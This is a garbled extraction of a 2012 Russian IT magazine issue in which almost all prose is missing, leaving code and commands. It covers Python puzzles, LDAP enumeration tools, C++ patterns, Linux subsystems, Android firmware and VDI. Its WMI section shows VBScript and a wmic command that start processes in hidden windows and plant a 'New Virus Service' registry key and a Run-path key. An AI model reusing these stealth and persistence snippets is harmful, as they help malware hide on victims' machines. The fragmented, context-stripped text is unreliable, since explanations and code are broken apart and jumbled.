TrueCrypt ,

XTS ,
128 , 64
. , ,
.
, 128 64-
, (
, ).
, ,
. ,
!

TrueCrypt
TrueCrypt, truecrypt,
truecrypt.org (
). ,
,
TrueCrypt PlainCrypt, http://
localhost/.
, Win7/Vista x64
. ,
, .
, , Microsoft,
.

HAPPY END
, , . , ,
. z

091

(ivinside.blogspot.com)


,

092



,

.
04 /159/ 2012

,
, ,
None, .
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}

:
def dictify(a, b):
# , ,
#
if len(b) > len(a):
return {}
#
# zip dict
dic = dict(zip(a, b))
# ,
if len(b) < len(a):
for i in xrange(len(b), len(a)):
dic[a[i]] = None
return dic

, Python 2.2 dict,


for:
keys = ['a', 'b', 'c']
vals = [1, 2, 3]
dic = {}
for (k, v) in zip(keys, vals) dic[k] = v


map,
. None, zip,

None. :
def dictify(a, b):
if len(b) > len(a):
return {}
dic = dict(map(None, a, b))
return dic

>>> myappend(**a)

:
[1, 2, 3, 0]
[0]
[0, 0]

[1, 2, 3] .
, ,

a, 0.
,
myappend(), .
myappend(*a) :
AttributeError: 'int' object has no attribute 'append',
,
.
:
a = [[1, 2], 3]
myappend(*a)
# :
# myappend([1, 2], 3)

myappend(**a) , : TypeError: myappend() keywords must be strings.


, , -, , :
,
:
a = {'a':[1, 2], 'num':3}
myappend(**a)
# :
# myappend([1, 2], 3)

, .
>>> a = Keeper()
>>> b = Keeper()
>>> for i in Keeper.list_instances():
...
print i
<Keeper instance at 0x...

:
def myappend(a = [], num = 0):
a.append(num)
print a


:
>>>
>>>
>>>
>>>
>>>
>>>

a = [1, 2, 3]
myappend(a)
myappend()
myappend()
a = {1:2, 3:4}
myappend(*a)

04 /159/ 2012



Python. , ,

. :
def f(...):
...
f = staticmethod(f)
@staticmethod
def f(...):
...

093


staticmethod,
,
, . (
instances):
class Keeper:
instances = []
def __init__(self):
self.instances.append(self)
@staticmethod
def list_instances():
return Keeper.instances
a = Keeper()
b = Keeper()
for i in Keeper.list_instances():
print i

__init__, , instances , list_instances ,


.
:
<__main__.Keeper instance at 0xb72aed4c>
<__main__.Keeper instance at 0xb72aee2c>

, ,
nmap. , tcp-
389, LDAP-. Anonymous
bind OK , , LDAP-,
DN .

,
login:hash,
. .
1. ldapminer. :
ldapminer -h <ip_> <>
-p [port]: 389
-B [bind]:
-w [password]:
-b [base search]: ,
-d [dump all]:

2. luma. ,
.
3. ldp. , Microsoft.
4. openldap.
LDAP-. ldapsearch. ,
.

?
389/tcp

open

ldap

(Anonymous bind OK)

, Metasploit
LDAP-,
. z


1. ? ?
class A:
def __init__(self, name):
self.name = name
def __del__(self):
print self.name,
aa = [A(str(i)) for i in range(3)]
for a in aa:
del a
print 'done'
# ...

2. , :
class Foo
{
public:
Foo(int j) { i=new int[j]; }
~Foo() { delete i; }
private:
int* i;
};

094

class Bar: Foo


{
public:
Bar(int j) { i=new char[j]; }
~Bar() { delete i; }
private:
char* i;
};
void main()
{
Foo* f=new Foo(100);
Foo* b=new Bar(200);
*f=*b;
delete f;
delete b;
}

3. (, access- web-)
.
. ,
,
.
4. .
.

04 /159/ 2012

, ,
.
-
.
,
,

,
,
.
096

deeonis (deeonis@gmail.com)


, , .
,
-
.
:
.
, html- ,
.
,
. , ,
, , . ,
, ,
.
:
, ,
/, , .
, ,
.

04 /159/ 2012

:

class Parser
{
// ..
public:
void parsePage(string url)
{
while (url != "")
{
//
getTopicText();
//
url = getNextUrl();
}
}
private:
void getTopicText()
{
// ...
}
string getNextUrl()
{
// ...
}
}

Parser,
parsePage(). .
parsePage() , .
,
getNextUrl() getTopicText(). ,
, , -,
( , - ),
-, .

void getDataOnPage()
{
// ...
}
string getNextUrl()
{
// ...
}
}


, ,
,
. , , , .
, , ,
, ,
,
, .

class ParserSite2
{
// ..
public:
void parsePage(string url)
{
while (url != "")
{
//
getDataOnPage();
//
url = getNextUrl();

, parsePage(),
. , , ,
, . :

class BaseParser
{
// ..
public:
virtual void parsePage(string url) = 0;
}
class ParserSite1: public BaseParser
{
public:
void parsePage(string url)
{
while (url != "")
{
//
getTopicText();

}
//
url = getNextUrl();

}
private:
//
Parser::getTopicText

04 /159/ 2012

}
}
private:

097

parsePage ,
, .
, , ,
.
, ,
getNextUrl() ,
parsePage().



. , . .
parsePage()
ParserSite1 ParserSite2 BaseParser. ,
(
),
.
parsePage
, .

void getTopicText()
{
// ..
}
string getNextUrl()
{
// ..
}
}
class ParserSite2: public BaseParser
{
public:
void parsePage(string url)
{
while (url != "")
{
//
getTopicText();
//
url = getNextUrl();
}
}
private:
void getTopicText()
{
// ..
}
string getNextUrl()
{
// ..
}
}

098


class BaseParser
{
// ..
public:
void parsePage(string url)
{
while (url != "")
{
//
getTopicText();
//
url = getNextUrl();
}
}
protected:
//
virtual void getTopicText() = 0;
virtual string getNextUrl() = 0;
}
class ParserSite1: public BaseParser
{
public:
// parsePage,
//
// ,
//
//void parsePage(string url);
protected:
//
//

void getTopicText()
{
// ..
}
string getNextUrl()
{
// ..
}
}

04 /159/ 2012

class ParserSite2: public BaseParser


{
// ParserSite1
}

, , , getNextUrl() getTopicText().
, ,
. ,

.
BaseParser.
,
. ? , , - , .
-
. BaseParser::parsePage().
-,
,
.

,
?
, , - ().
, ParserSite1
, ParserSite2 - . ,
. ,
- , ParserSite2 .
parsePage .

.
parsePage()
while. .

class BaseParser
{
// ..
public:
void parsePage(string url)
{
while (url != "")
{
//
if (stopHook())
break;
// ...
}
}
protected:
//
virtual bool stopHook() {return false;};
// ..
}

.
,
, (
).
False, .
BaseParser
.

class ParserSite1: public BaseParser
{
// ..
protected:
// ,
//
// bool stopHook();
}
class ParserSite2: public BaseParser
{
// ..
private:
int count;
protected:
//
bool stopHook()
{
if (count > 3)
return true;
else
return false;
}
//
void getTopicText()
{
// ...
count++;
}
}

, ParseSite1 , parsePage
. ParseSite2
,
, .
,
parsePage
, ,
.


. .
: ,
. , ,
. z

stopHook() ,

04 /159/ 2012

099

(stannic.man@gmail.com)

WMI:



,

.

,
Windows.

Windows Management Instrumentation (WMI),


. , ][

WMI (xakep.ru/magazine/xa/118/030/1.asp).
.


, WMI
. .
! .
, , WMI
. , , ,
WMI , .
.
?
Const SW_NORMAL = 1
Const SW_HIDE = 0
strComputer = "."
strCommand = "notepad.exe"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = SW_NORMAL

Notepad

100

Set objProcess = objWMIService.Get("Win32_Process")


intReturn = objProcess.Create _
(strCommand, Null, objConfig, intProcessID)

04 /159/ 2012

WMI:


WMIC /?. ,
.
, , WMIC. WMIC
WMI-.
, ,
. ,
,
process call create "calc.exe".
. , ?
100% , , :

ShowWindow:
, SW_
HIDE = 0. ,
taskmanager ,
! !
-, vbs-, !
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objReg=GetObject( _
"winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\\CurrentControlSet\\Services\\MyService"
objReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strValueName = "Descrition"
strValue = "New Virus Service"
objReg.SetStringValue _
HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\
Windows, . , , , ,
. Windows XP, , Win7 HKEY_LOCAL_MACHINE .

HKEY_CURRENT_USER. ,
, . , ,
( , HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run),
vbs-. .

,
VB- Java. ,
WMI (WMI command-line).
wmic. WMI
,
VBS- JS-.
WMI WMI-, . ,
WMI, .
WMIC QFE
, .

04 /159/ 2012

wmic /NameSpace:\\root\default Class StdRegProv Call CreateKey hDefKey="&H80000002" sSubKeyName="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\fuck_avers"

, ,
,
,
. vb-
- ( ),
(
)
. -, .

, . ,
- , ,
Windows, .
, , , ,
. z

DYNAMICWRAPPERX

DynamicWrapperX (script-coding.com/dynwrapx.html).
WMI, ,
. ActiveX- (-),

VB- , dll-,
, Windows API.
, , CreateWindowEx vb
, . DynamicWrapperX

.
COM- :
"regsvr32.exe dynwrapx.dll", DynamicWrapperX

WinAPI- VB/Java-!
:
Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32", "Beep", "i=uu"
DX.Beep 800, 1000
, ,
!

101

UNIXOID

Adept (adeptg@gmail.com)

OpenSource
.
-
: ,
,

,

.



.

102

Gimp 2.8

04 /159/ 2012

lsmod kmod

X: REVOLUTION
Wayland ( C,
10 000 , MIT),
X-! X :
,
.
Wayland (Wayland Compositor
Wayland Server) , X
, , X-,
. Wayland Compositor
Weston,

Wayland. Wayland Compiz Kwin.

Wayland Client ( ).

, X Server,
.

.
Wayland ,
Direct Rendering (DRI), KMS (Kernel Mode
Setting) GEM (Graphics Execution Manager),
Linux
Intel, Radeon Nouveau.

( , X11).
Wayland

,
.
(, ) Wayland :
Qt, GTK, EFL (Enlightenment Foundation Library),
Clutter, SDL. ,
(
),
X.Org- Wayland-

04 /159/ 2012

(
).
Wayland
( 2008 ),
, - . , 1.0
,
.

KMOD: EVOLUTION

RedHat
, ,

Linux ,
: goo.gl/RWgbf. ,
kmod.
module-init-tools (,
: lsmod,
modprobe, rmmod ), libkmod,

( LGPLv2 ).
udev.

modprobe ( ,
), libkmod


.

udev .
udev, kmod
systemd. Arch Linux, ,
kmod 4. Debian kmod 3.

SYSLOG: DESTRUCTION
Systemd (
SysVinit Upstart),
.
,

Journal, systemd
38. ,
syslog, .
syslog, , .
syslog
- :
, mysql
10000, .
, .

.
.
Syslog , Linux:
utmp/wtmp/btmp, lastlog, ,
.
,
.
-
,
(
).
syslog , : ,
.
,
.
:
, .
.
:

,
DoS-.

.
coredump.

103

UNIXOID



.
Journal :
.
,
.
, .
,
.
,

, .

(, ).
git.
API syslog (
) .

.

.
, .

.
, utmp/wtmp,
.

SUID

, .
,
tail, less grep .

.

,

,
-
, .
/bin,/sbin,/lib(/lib64) /usr.
Fedora ( ,

RPM-).

.
,
read-only,
.
Solaris 11.

SUID/SGID- capabilities ,

. SUID-.
chroot, ,
libvirt-sandbox.
libvirt, ,
-,
read-only.
Fedora 17.
-, ,

Fedora :
.
Canonical
.
Ubuntu HUD (Head-Up Display): ,


UEFI (Unified Extensible Firmware Interface)
BIOS,
- , ,
, .
UEFI , ( )

GPT ( MBR).
UEFI . .
UEFI 35 ( ,
Linux 30 ),
2 200 .

.
UEFI,
2.3.1, secure boot. ,
: (,
SHA-256 ), (, ,
)
(RSA, 2048 ),
. ( )
.
, (,
MBR). ,
( )
,

104

.
( Gentoo), , ,
,
- UEFI. Red Hat, Canonical
Linux Foundation
, FSF
, secure boot
restricted boot ( ).
, ,
, Grub2
GPLv3, ,
.
Grub Legacy
GPLv2, GPLv3.
UEFI secure boot
,
. ,
Microsoft ,
/ Compatible with Windows 8,
Secure Boot.

. ARM
secure boot. :
( HP Dell) ,
secure boot.

04 /159/ 2012

,

. ,


.
. , , HUD
,
. , . ,
, HUD
Ubuntu 12.04.


,
,
,
.
.
IPv6. . , IPv4 World IPv6 Day, IPv6
.
IPv6 NAT. , , ,
, netfilter
.
FIOPS (Fair Input/Output Operations Per
Second) /, SSD.

CFQ ( ),
SSD, ,
,
,
.
CFQ
read/write .
, , ,
, Linux 3.5 .
ext4-snapshots
ext4 ( , btrfs).

LVM:

,

. , ,

ext3 (NEXT3)
.
Gimp 2.8, , -

.

OpenSource- id Tech 4, Doom 3.
Zenimax (
)
GPLv3 ( ).

04 /159/ 2012



,
.
.
Nftables iptables/netfilter. :
ABI, (iptables, arptables
ebtables ,
),
(-

). (
][ #127), , ,
, iptables. Fedora, ,

firewallD,
. Fedora
17 , ,
.

Linux
Linux Foundation.
: Maemo
Nokia (
Nokia 770, N800,

N810 N900 2005 ) Moblin


Intel ( 2007 ). 2010
Nokia Intel
Meego,

Maemo Moblin. ,

,
Linux Foundation.
N9 Nokia Meego, Windows Phone.
, Linux
Foundation LiMo
(Linux Mobile) Foundation
Tizen
HTML5. Meego, ,
Mer.
Tizen Samsung Bada.
, ,
,

.


. ,

. z
INFO

,

.

TiVo.

Wayland X Server

utmp/wtmp/
btmp
,

,
/

.

systemd
][ 148.

WWW

FAQ
wayland:
goo.gl/SNq3E.

X12: goo.
gl/Mi23E.

Wayland. X.Org

105

UNIXOID

(zobnin@gmail.com)

KOBJECTS, SYSFS,
UDEV, UDISKS
UPOWER
Linux
2.6
sysfs,

.
sysfs

,

.
,
, .
106

, sysfs
, Linux .

, , udev
( /dev), udisks
( ) upower ( ,
ACPI
, sysfs).
.

KOBJECTS SYSFS
2.5,
2.6, , ,
. , KObject ,

, . ,
, SCSI-,
K-,
, - . , usb- usb-.
- (kset) , .

04 /159/ 2012

/sys/class/ .

/sys/device , ,
-, .
, /
sys/devices . sysfs :
/sys/firmware/ firmware,
;
/sys/fs/ ,
FUSE ( ext4 );
/sys/kernel/
(, );
/sys/module/ , ,
( parameters,
);
/sys/power/ .

modules.alias


ddfs (Device
Drivers FileSystem),
- .
sysfs,
Linux. sysfs ?
sysfs
- , - ,
,
. , ,
, SATA-
, , ,
. ,
, ,
( ) .
. :
$ cat /sys/class/net/eth0/address

MAC- eth0.
/sys/class/net/eth0,
, ,
.
cat /sys/block/sda/size
sda, 512- .

sysfs .
,
, , .

UDEV
sysfs, , ,
? . Linux , , . -
procfs, ioctl-
, ( dmidecode). ,
, . sysfs
: ,

,
plug and play.
, sysfs
, udev, /dev
. Udev
netlink-, (
uevent) , USB- .
, ,
sysfs,
. , sysfs,
/dev,

# echo performance > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor

( , ) .
sysfs,
. ,
: class, block,
devices. , . ,
sysfs :
/sys/device/ , ;
/sys/block/ ;
/sys/bus/ , ;

04 /159/ 2012

sysfs

107

UNIXOID

udevadm monitor udev

minor/major-.
,
(, vendor , model
), sysfs modalias,
"pci:v000010ECd00008139sv00001734sd
000010B8bc02sc00i00". , udev
.
,
. /lib/
modules/_/modules.alias,
modprobe. udev
, modprobe
modalias .
:
# modprobe pci:v000010ECd...

udev,
devfs, ,
,
/dev,
,
sysfs.
, ,
/dev ,
. udev-.
/lib/udev/rules.d, /etc/udev/rules.d.

.
, udev
d-bus. ,
, PolicyKit,
. ,

udisks --show-info /dev/sda


. -
,
.

udev, ,
, udisks upower.

UDISKS UPOWER
udisks upower
.
DeviceKit, udev, . udev, sysfs d-bus ,

.
, sysfs,
, udev,
, -
. udisks upower
, , . Udisks, ,
(
udev) :

, , / ,
, . ,
root sysfs ,
d-bus,
PolicyKit . , udisks (,
- ), udev.
udisks ,
. , ,
:
$ udisks --dump




, UDEV
D-BUS
108

,
, SMART:
$ udisks --show-info /dev/sda

:
$ udisks --eject /dev/cdrom

04 /159/ 2012

udev

:
$ udisks --set-spindown /dev/sda --spindown-timeout

, , root. DE udisks
. , devmon. udisks devmon, ~/.xsession
( fluxbox ):

, . ,
,
,
.
,
,
udev, sysfs ACPI.
udisks, upower , , ,
.
upower --dump.

exec ck-launch-session bash -c "devmon & fluxbox"

.
upower -

04 /159/ 2012

sysfs udisks ,
. sysfs:

109

UNIXOID
INFO

1. :


sysfs,

/sys/class,



.

$ grep -r . /sys/class/net/eth0/statistics

2. , ( - SSD
):
# echo 0 > /sys/block/sdb/queue/rotational


sysfs
uevent,


major/minor-.

udev

.

3. SCSI- ( ):
# echo "- - -" > /sys/class/scsi_host/host0/scan

4. USB-:
$ for i in `find /sys/devices/*/*/usb* \
-name level`; do echo -n "$i: "; cat $i; done

5. (,
):

upower --dump

/mnt.
.
2. :

# cat /sys/devices/virtual/dmi/id/*

6. :

ACTION=="add", KERNEL=="sd</a-z><a-z><0-9>",
ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/cp -a /mnt/%k /backup/%k"

# cat /sys/class/hwmon/hwmon0/temp1_input

7. (
/sys/class/backlight/acpi_video0/max_brightness):


( /backup/_
) cp.
.

# echo 8 > /sys/class/backlight/acpi_video0/brightness

3. :
8. ( mem disk ):
# echo mem > /sys/power/state

, ,
sysfs. ,
.
udev. udev , ,
, . /lib/udev/rules.d () /etc/udev/rules.d.
,
.
/etc/udev/rules.d/99-custom.rules. ?
1. :
ACTION=="add", KERNEL=="sd<a-z><0-9>",
ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/mkdir -p /mnt/%k"
ACTION=="add", KERNEL=="sd</a-z><a-z><0-9>",
ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/mount -o rw,noexec,dmask=000,fmask=111,utf8
/dev/%k /mnt/%k"
ACTION=="remove", KERNEL=="sd</a-z><a-z><0-9>",
ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/umount /mnt/%k"

, USB-. USB Mass Storage

110

SUBSYSTEM=="net", ATTR{address}=="aa:bb:cc:dd:ee:ff",
NAME="lan0"
SUBSYSTEM=="net", ATTR{address}=="ff:ee:dd:cc:bb:aa",
NAME="wlan0"

MAC- . ATTR{address} address sysfs.


4. :
ACTION=="add", SUBSYSTEM=="input", KERNEL=="mouse[1-9]",
ENV{DISPLAY}=":0.0",
ENV{XAUTHORITY}="/home/USERNAME/.Xauthority",
ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", KERNEL=="mouse[1-9]",
ENV{DISPLAY}=":0.0",
ENV{XAUTHORITY}="/home/USERNAME/.Xauthority",
ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=0"

synclient ,
/dev/mouse0,
/dev/mouse1 .

sysfs Linux
,
,
. sysfs+udev+udisks.
,
. z

04 /159/ 2012

UNIXOID

(execbit.ru)



ANDROID-: CYANOGENMOD VS MIUI

Android
?
.


,


: CyanogenMod MIUI.
,

,
,

.

04 /159/ 2012

, CyanogenMod MIUI ,
Android.
, - Google
.
,


(, CyanogenMod
Geeksphone One, ,
).

, ,

.

CYANOGENMOD. ANDROID

OPEN SOURCE
, CyanogenMod (cyanogenmod.com). , Android
.


Android.
xda-developers,
Cyanogen ( ,
Samsung),
,
JesusFreke. CyanogenMod Android,
T-Mobile G1 (Android 1.5). ,
Cyanogen ,
,
,
, Google.
CyanogenMod
,
56 ,
Google Nexus S HTC Incredible, HTC Tattoo Huawei

111

UNIXOID
(, ).
OpenVPN,
.
(,
tap-to-focus), .

.


CyanogenMod

CyanogenMod

U8220.
xda-developers.com.
7.1.0
Android 2.3.7.
, Android 4.0.3 (,
8.0 Android 3.0,
Google

). CyanogenMod
9,
.

- MIUI


CyanogenMod, ? .
-, CyanogenMod
,
, : , SSH-,
bash busybox.
-, CyanogenMod ,
,

. CyanogenMod
,

, ,
.
CyanogenMod
, .
,
CyanogenMod,
Android:
/etc/init.d. CyanogenMod,
Linux,
(,
samba ftpd) (
, ).

. CyanogenMod ,
ext2- .
bash, busybox

112

ssh,
SSH adb.
SSH- .


.
,
T-Mobile.
Android Market.

FLAC.
,
.
Wi-Fi, Bluetooth USB-
( CM
Android 2.2).
,
.

, Bionic.
,

, ?

. ? ,
:
root-,
(recovery),
Google- (, Gmail ).
root, boot-
NAND-,
(, ,
).
Android root
, -
(/bin/login) UID (/bin/su).
Android-.
:
Android zroot (goo.gl/mp6wg), Windows
Linux SuperOneClick (goo.gl/HIbN),
mono.
Android,
. ,
google.

recovery. SuperOneClick , Rom Manager,

SuperOneClick

04 /159/ 2012


(goo.gl/W8dJK). ,
Flash ClockworkMod Recovery. (
: cyanogenmod.com/devices)
Google (goo.gl/6OchT). Rom Manager
, Reboot into
Recovery. ( , ),
,
Wipe data/factory reset,
,
Yes. , Install zip from sdcard, ,
Yes. Google. Reboot system
now.


. ,
. .
.
, MIUI.
,
: Menu Settings CyanogenMod Settings
Interface Notification Power Widget
Widget Buttons.



.
: Menu Settings
Application Settings Development Stop
app via long-press.
CyanogenMod

.
: Menu Settings
CyanogenMod Settings Lockscreen
Lockscreen gestures.
LED-
: Menu Settings CyanogenMod
Settings Interface > LED notifications.
Android, CyanogenMod
, , .
,
,
: Menu Settings
CyanogenMod Settings Application Settings
Install location.
CyanogenMod . : Menu Settings
CyanogenMod Settings System Update
notifications.

: Menu Settings
CyanogenMod Settings Status bar tweaks
Battery Status Style Percentage.


, : Menu
Settings CyanogenMod Settings Input
Volume button music controls.
: Menu
Music Settings Enable gestures.

(, ),
(Menu Settings Applications
Manage Application),
Permissions ,
.

:
Menu Settings CyanogenMod settings
Lockscreen Unlock options Menu unlock.
,

, ,
: Menu
CyanogenMod settings Input Long press
home settings Number of recent apps.

: Menu CyanogenMod settings
Performance Disable boot animation.
Lock home in
memory,

.

MIUI

04 /159/ 2012

113

UNIXOID

MIUI Samsung Galaxy S

Screenshot,
SD-, DCIM/
Screenshots.
CyanogenMod
DSPManager,
(, ).

MIUI. ANDROID -
MIUI ( Me
You I). CyanogenMod, ,
MIUI
Xiaomi Tech (xiaomi.com),
iOS
Android. 2010 ,

Android,
, , ,
. Xiaomi Tech

CyanogenMod
, , .

,
, CyanogenMod.

114

MIUI
. ,
,

. ,
,
,
,
,

. , , ,
,
.
, .
, -
MIUI, CyanogenMod, ,
, Android:
1. T9-.
,
Dialer One,
.
2.
, .
,
,
, .

3. . CyanogenMod, -

, MIUI
/. , , - ,
.
4. .


, 3G .

, .
5.
- . ,
,
,
.
6. (
).
7. OTA- .

.
8. . MIUI
, ,

04 /159/ 2012

INFO

Google,
Google
Nexus One, Google
Nexus S Samsung
Galaxy Nexus,

root-.
MIUI

: MI,
Mobile
Internet (,
,
Mission Impossible),
UI User Interface.



MIUI

,
.
9.
.
, Android.
10. .
,
.
MIUI
iOS,
iPhone, . MIUI iOS,
: , ,
,
. iOS:
,

,
, , .
, ,
,
( ,
- ).
MIUI .
, ssh
, , , ext2-. ,
, , ,

.

04 /159/ 2012

MIUI CyanogenMod,
,
Google, Gmail,
,
.

. ,
MIUI
, ,
.
, ,
miuiandroid.com (
ROMs).
miui.su,

.

. :
,
2.3.7,
- 2.1.20, ICS
(Android 4.0) 2.1.13. , .

.
3.
.
4.
.
5.
.
6. , .
7.
(SettingsSystem Battery
Notification Indicator Style Percentage).
8. , .
9.
,
.
10.

,
.

MIUI
. ,
,
.
, ,
. , MIUI.
1. .
2.

CyanogenMod
MIUI ,

.
,


.
,
, . z

115

SYN/ACK
SYN/ACK

(grinder@synack.ru), (j1m@synack.ru)

VDI WIN2K8R2
LINUX

116

, ,
, ,
,
.
,

,
, .
.
04 /159/ 2012

Hyper-V

VDI WIN2K8R2
Terminal Services Win2k8R2,
, Remote Desktop
Services (RDS). , VDI
(Virtual Desktop Infrastructure) Win2k8R2
DaaS (Desktop as a Service).
RD Virtualization Host Hyper-V
VM, RDS RDP.
(
) ,
.
, , ,
. .
TS/RDS VDI ,

,
.
, ,
, ,
. : , .
:
Personal Virtual Desktops ,
, ,
VD;
Virtual Machine Pool
VDI, , ,
,
.
VD .
, (,
, ), , ,
.
, VD,
,
. : -

04 /159/ 2012

AD

,
, .
, , AD ( Win2k8R2),

(Active Directory -> ), (Personal Virtual Desktop).
VDI RDS:
RD Web Access , ,
;
RD Gateway ,
;
RD Connection Broker VM, , ;
Remote Desktop Session Host (RDSH) , RemoteApp;
RD Virtualization Host (RDVH)
VDI, Hyper-V ( ,
);
RD Licensing RDS CALs, 120
.
VDI , VDI RD Web Access RDP ,
.
:
Hyper-V, RDP, -

VDI
,



117

SYN/ACK
SYN/ACK
. ,
Hyper-V RDS (Add RD Virtualization Host Server) (onfigure Virtual Desktops Wizard),
Hyper-V, RD
Connection Broker RD Web Access.
. AD (Assign Personal Virtual Desktop). VD
RD Connection Broker Virtual
Machine Pool Creation Wizard,
RD Connection Broker.
(BPA).

- QVD Web Administration Tool

SPICE
UNIX
, , ,
. UNIX . X-,
,
. , 80-.
X- .
, ,
X- .
,
. , ,
.
, . Spice
. Spice ,
, ,
, USB- .
,
,
, , -, , (
, , ). Spice
-

,
, , ,
, - .
, Spice ,
.

. , Spice,
, Spice-, /,
Spice-
( ).
Red Hat, Spice 2009 ,
, . Spice
QEMU, libvirt virt-manager virsh. Spice,
, X-,
spicec, X
Window, Firefox, GTK Qt.
,
Spice- :

QVD

118

1. :
$ sudo apt-get install qemu-kvm

04 /159/ 2012

- Ulteo

$ qemu-kvm -spice port=1234,disable-ticketing \


-hda ////

,
:

2. :

$ sudo /etc/init.d/libvirtd start

$ sudo apt-get install spice-client


$ spicec -h localhost -p 1234

, virt-manager libvirtd:

, - ,
,
virt-manager.
, virt-manager ,
libvirtd ssh. ,
qemu, libvirt libvirtd:

$ sudo apt-get install virt-manager


$ virt-manager -c qemu+ssh://root@server.com/system

$ sudo apt-get install bridge-utils dnsmasq \


kvm qemu libvirt libvirt-bin

, , , .
UNIX, Spice- xorg-video-qxl,
.
, -> ,
, Graphics,
Spice server,

MED-V APP-V
,
WinXP Win7 Vista
. ,
.
. MEDV (Microsoft Enterprise Desktop Virtualization, clck.ru/WQqT)
VDI, .
XP Mode,
(WinXP/Vista) Virtual
PC. ,
,
.
App-V (Microsoft Application Virtualization)
,
.

04 /159/ 2012

(
), . , App-V
,
( MED-V),
.
, ,
.
Win7 Home/Starter
.
MED-V, MDOP (Desktop Optimization Pack, ).
, MED-V, ,
, MED-V 2.0 App-V
System Center Configuration Manager.

119

SYN/ACK
SYN/ACK

SPICE
,
, USB-,

. qxl,
qxl. , Spice.
,
Spice- . Linux , X-
.

:
spicec -f -h _ -p _ -w

~/.xsession ,
exec, ~/.config/
autostart, .
Spice-

.
( , ), .
, Spice .
virt-manager .
(

-> Clone) . ,
, 10-15, ,
virt-manager (
).

QVD
QVD (Quality Virtual Desktop, theqvd.com)
, VDI
, GNU/Linux VM
.
VDI . VDI,
. VD (overlays),
( )
. .
Windows Linux,
Android.
QVD ,
(Return on Investment, ROI). , BBVA Bancomer.
QVD KVM (Kernel Virtual Machine),
NX,
. LDAP.
:
QVD-,
PostgreSQL. ,
. , QVD
35 000 -

QEMU VM
Guest

vdagent

qxl driver

vmc
virtio-serial

QXL (cirrus)

standard guest drivers

Keyboard
Mouse Tablet

AC97
ES1370

(nic)

record
playback

(tunnel)

spice server

main

display
cursor

inputs

spice client

users machine

(printer)

Spice

120

04 /159/ 2012

INFO

ULTEO OPEN VIRTUAL DESKTOP (OVD)


OVD (ulteo.com) ,
Mandrake/Mandriva Linux,
-

Linux Windows.
,
Java .
Amazon EC2. OVD
: ,
, .
.
LDAP/AD CAS.
RC8 3.0.

HTTPS/443,

RDP (TCP/3389).
,
.
, .
( )
Ubuntu 10.04 LTS, RHEL 5.5 ( CentOS Fedora), Novell SLES 11 SP1, Win2k3/2k8/R2 (
). DVD,
Ubuntu.
Ulteo
,
, ,
,
.

ORACLE VDI
, Oracle Virtualization
,
( Sun Ray)
(Sun Fire, Sun Storage). Oracle VDI
connection broker

RDP SGD (Oracle Secure Global Desktop).
(Virtualization Layer)
VirtualBox, VMware vSphere, Hyper-V, ,
RDP.
(Windows, Solaris,
Linux, *nix ). SGD
-,
(,
Java[RR1]),

WWW
(
cookie, , ).
, VDI
Java -. kiosk
mode
.
Array Resilience

.
, ,
,
32- .
AD/LDAP.
Solaris Oracle Enterprise
Linux ( RHEL).

9 000 ,
. ,
VM IP.
: L7R, HKD (House Keeping
Daemon), / VM , Node
L7R HKD. NAS/SAN .
- QVD Web Administration
Tool (WAT, Perl Catalyst) (qvd-admin).
QVD Community, Commercial Cloud ( QVD).
.
Ubuntu 10.04
LTS SLES, (
Ubuntu 10.10). , QVD
Linux. Ubuntu 10.04
LTS ,
:
$ sudo apt-add-repository \
'deb http://theqvd.com/debian lucid main'
$ sudo apt-get update

04 /159/ 2012



Win2k8 ][
09.08;
HyperV

, ][
02.09;
][ 11.10

VMware View 4.5;
Win2k8R2 RDS

/

IP-

,

IP;
TS/RDS
VDI
,

;

QVD

BBVA
Bancomer.


Microsoft
RDS
VDI: clck.ru/WddP;
QVD:
theqvd.com.

WARNING



HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer

AllowRemoteRPC 1.

qvd-*.
, :
$ sudo apt-get install \
qvd-demo-single-instance-nosupport qvd-admin

WAT, 3000 , .
, , ( , ).
/var/lib/qvd/storage (
NFS): homes (qcow2 /home), images (), overlays ( )
staging.

,
,
, . z

121

SYN/ACK
SYN/ACK

(zobnin@gmail.com)



SAMBA
122
0122



.

, NAS,


,
.

04
04 /159/
/159/ 2012
2012

, CTDB

,
, GNU/Linux Samba.
, :
.

Samba
, ,
Linux Samba,

. ,
.
, RAID1-,
,
. , , ,
.
.
, -
,
c DRBD . :
Samba, ,
.
UNIX CIFS
Samba
, TDB,
Windows SID Unix UID/GID,
, .
Samba ,
TDB, .
, CTDB (Cluster TDB),
Samba
. CTDB

, .

04
04 /159/
/159/ 2012
2012


Samba .
1. ,
.
2. RAID1 .
3. RAID1-.
4. Samba.
5. CTDB
Samba.
,
.


, ,
. /dev/sda
( Debian), /dev/sdb
Samba. ,
.

RAID1. DRBD -,
.
,
,
.
, , 10.0.0.1 10.0.0.2
IP-, -, 192.168.0.1 192.168.0.2
,
(
, ).
IP-
:
# apt-get install drbd8-utils

/etc/drbd.conf
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
123
0123

SYN/ACK
SYN/ACK

(zobnin@gmail.com)

DRBD

resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
